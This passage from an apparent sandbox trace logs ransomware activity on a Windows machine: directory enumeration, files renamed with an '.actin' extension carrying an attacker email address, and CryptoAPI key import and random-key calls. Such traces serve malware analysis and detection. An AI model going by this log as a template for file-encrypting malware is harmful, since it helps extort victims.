nFileSizeHigh=0x0, nFileSizeLow=0x13242, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Setup.exe.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPE~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82068cae, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82068cae, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82e93039, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xc5252, dwReserved0=0x430054, dwReserved1=0x153, cFileName="SetupEngine.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPE~2.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b54206, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b54206, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82b7347c, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x48252, dwReserved0=0x430054, dwReserved1=0x153, cFileName="SetupUi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPU~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b7347c, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b7347c, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82b97d6a, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x76a2, dwReserved0=0x430054, dwReserved1=0x153, cFileName="SetupUi.xsd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPU~2.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b97d6a, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b97d6a, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82b97d6a, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x17862, dwReserved0=0x430054, dwReserved1=0x153, cFileName="SetupUtility.exe.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPU~3.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b97d6a, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b97d6a, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82edf372, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xa182, dwReserved0=0x430054, dwReserved1=0x153, cFileName="SplashScreen.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SPLASH~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e93039, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82e93039, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82eb8f34, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x23522, dwReserved0=0x430054, dwReserved1=0x153, cFileName="sqmapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SQMAPI~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82eb8f34, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82eb8f34, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82eb8f34, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x3802, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Strings.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="STRING~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82eb8f34, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82eb8f34, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82edf372, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x98f2, dwReserved0=0x430054, dwReserved1=0x153, cFileName="UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="UIINFO~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82edf372, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82edf372, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82edf372, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x19782, dwReserved0=0x430054, dwReserved1=0x153, cFileName="watermark.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WATERM~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x83c22088, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x5b5245, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Windows6.0-KB956250-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~2.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x835fd159, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7652, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Windows6.0-KB956250-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~1.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x84a9642b, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x59b300, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Windows6.1-KB958488-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~3.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x843aaeaf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2cae2b, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Windows6.1-KB958488-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~4.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x843aaeaf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2cae2b, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Windows6.1-KB958488-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~4.ACT")) returned 0 [0135.256] FindClose (in: hFindFile=0x13273d8 | out: hFindFile=0x13273d8) returned 1 [0135.256] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43a1ad0 | out: hHeap=0x2cb0000) returned 1 [0135.256] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84bc7721, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x84bc7721, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x84bc7721, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf2, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="BOOTNXT.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="BOOTNX~1.ACT")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x84bc7721, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x84bc7721, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x84bed9ff, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2102, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="BOOTSECT.BAK.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="BOOTSE~1.ACT")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0fd07c9, ftLastWriteTime.dwHighDateTime=0x1d53297, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x85a620f7, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x85a620f7, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xf2d6e7f9, ftLastWriteTime.dwHighDateTime=0x1d53297, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x685aef98, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x685aef98, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7511354, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe7511354, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0135.257] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xf2d6e7f9, ftLastWriteTime.dwHighDateTime=0x1d53297, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0135.258] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0135.258] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0135.258] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0135.258] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0135.258] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0135.258] FindClose (in: hFindFile=0x1327598 | out: hFindFile=0x1327598) returned 1 [0135.258] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43918a8 | out: hHeap=0x2cb0000) returned 1 [0135.258] SetEvent (hEvent=0x500) returned 1 [0135.258] SetEvent (hEvent=0x4fc) returned 1 [0135.258] SetEvent (hEvent=0x504) returned 1 [0135.258] WaitForSingleObject (hHandle=0x504, dwMilliseconds=0xffffffff) returned 0x0 [0135.259] SetEvent (hEvent=0x500) returned 1 [0135.259] SetEvent (hEvent=0x4fc) returned 1 [0135.259] SetEvent (hEvent=0x504) returned 1 [0135.259] WaitForMultipleObjects (nCount=0x2, lpHandles=0x46bfac8*=0x508, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0135.369] CloseHandle (hObject=0x50c) returned 1 [0135.369] CloseHandle (hObject=0x508) returned 1 [0135.370] CloseHandle (hObject=0x4fc) returned 1 [0135.370] CloseHandle (hObject=0x500) returned 1 [0135.370] CloseHandle (hObject=0x504) returned 1 [0135.370] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43818a0 | out: hHeap=0x2cb0000) returned 1 [0135.371] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb48c0 | out: hHeap=0x2cb0000) returned 1 [0135.371] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4880 | out: hHeap=0x2cb0000) returned 1 [0135.371] SetEvent (hEvent=0x4c8) returned 1 [0135.371] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0135.371] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43511f0 | out: hHeap=0x2cb0000) returned 1 [0135.371] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0135.372] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43a18b0 | out: hHeap=0x2cb0000) returned 1 Thread: id = 84 os_tid = 0xf40 [0134.859] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43b1ad8 [0134.859] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43c1ae0 [0134.860] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb48e0 [0134.860] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x110102) returned 0x4bcb020 [0134.862] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x2cb44c0 [0134.863] CryptImportKey (in: hProv=0x12f68a8, pbData=0x47ff7a0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x47ff808 | out: phKey=0x47ff808*=0x13275d8) returned 1 [0134.863] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x47ff7f0, dwFlags=0x0) returned 1 [0134.863] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb44c0, pdwDataLen=0x47ff7bc | out: pbData=0x2cb44c0, pdwDataLen=0x47ff7bc) returned 1 [0134.863] CryptDestroyKey (hKey=0x13275d8) returned 1 [0134.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0134.863] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0134.863] Wow64DisableWow64FsRedirection (in: OldValue=0x47ff858 | out: OldValue=0x47ff858*=0x0) returned 1 [0134.863] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb44c0 | out: hHeap=0x2cb0000) returned 1 [0134.863] CryptGenRandom (in: hProv=0x12f68a8, dwLen=0x10, pbBuffer=0x47ff860 | out: pbBuffer=0x47ff860) returned 1 [0134.863] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0134.863] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x47ff7f8 | out: lpFileSize=0x47ff7f8*=129) returned 1 [0134.863] CloseHandle (hObject=0x540) returned 1 [0134.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0134.864] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0x20 [0134.864] ResetEvent (hEvent=0x4e8) returned 1 [0134.864] SetEvent (hEvent=0x4ec) returned 1 [0134.864] CryptGenRandom (in: hProv=0x12f68a8, dwLen=0x10, pbBuffer=0x47ff860 | out: pbBuffer=0x47ff860) returned 1 [0134.864] CreateFileW (lpFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0134.867] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x47ff7f8 | out: lpFileSize=0x47ff7f8*=0) returned 1 [0134.867] CloseHandle (hObject=0x540) returned 1 [0134.867] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0xffffffff) returned 0x0 [0135.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x4f30050 [0135.271] CryptImportKey (in: hProv=0x12f68a8, pbData=0x47ff7a0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x47ff808 | out: phKey=0x47ff808*=0x13273d8) returned 1 